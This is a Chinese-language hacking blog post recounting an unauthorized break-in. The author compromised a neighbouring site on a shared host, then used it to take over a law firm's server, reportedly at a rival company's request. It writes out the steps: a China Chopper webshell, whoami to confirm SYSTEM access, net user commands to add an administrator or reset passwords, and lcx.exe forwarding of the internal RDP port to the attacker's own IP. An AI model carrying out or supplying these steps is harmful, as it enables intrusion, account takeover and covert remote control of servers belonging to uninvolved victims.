运气拿下旁站律师事务所服务器lcx转发拿下服务器-By白菜
大家好 我是白菜
今天朋友给我发了一个站让我提权 因为他公司的老总看到别人公司的野鸡太好了
所以就找到我给他搞下来 要不然就会被开除了 听说 前提是我一分钱都没拿 真的
就凑这个机会做一个菜鸟级别的文章 简单拿下目标的旁站提权 lcx转发拿下目标服务器
为了安全起见还是涂上吧
简单的看了一下目标站 度娘 谷姐 各爬行都用上了 但是找不到什么可以利用的 所以就www.aizhan 了一下同服务器有多少站 结果呢就随便找了一个站简单的拿下了shell
废话完毕 咱们 直接上图吧
菜刀链接这个站支持aspx 所以我就用aspx的一句话链接的 因为我喜欢用菜刀提权
接下来我习惯性的 打开菜刀的虚拟终端随便一个回车
看到这样 貌似是个 system 权限
为了更加确定是不是这个权限 我 whoami了一下
呵呵 接下来省略了很多麻烦了吧 提权工具各种无视了
既然是这个权限直接建立帐号吧
Net user admin xxxxxxx /add
net localgroup administrators 用户 /add
或者你想更直接的话 就直接修改上面的任意帐号密码
Net user 服务器上的用户 123456 回车就行了 因为system权限可以这样做
查看了一下端口
果断是内网
这个服务器本来就是开了3389的 由于是内网需要转发
随便找个可写目录C:\WINDOWS\Temp\ 上传 lcx.exe
在本机监听端口lcx.exe -listen 1234 4567 1234你监听的端口 4567 转发到的端口
在shell运行 路径\lcx.exe -slave 你的IP 你监听的端口 肉机IP 要转发的目标主机端口
如果你是内网得映射监听的端口 因为我是内网 所以我用的服务器
本地监听完毕 接下来 在shell上运行命令
接下来链接服务器吧 www.2cto.com
成功
找到目标站打上一句话 就可以了
文章到此结束
BY:白菜
共有 0 条评论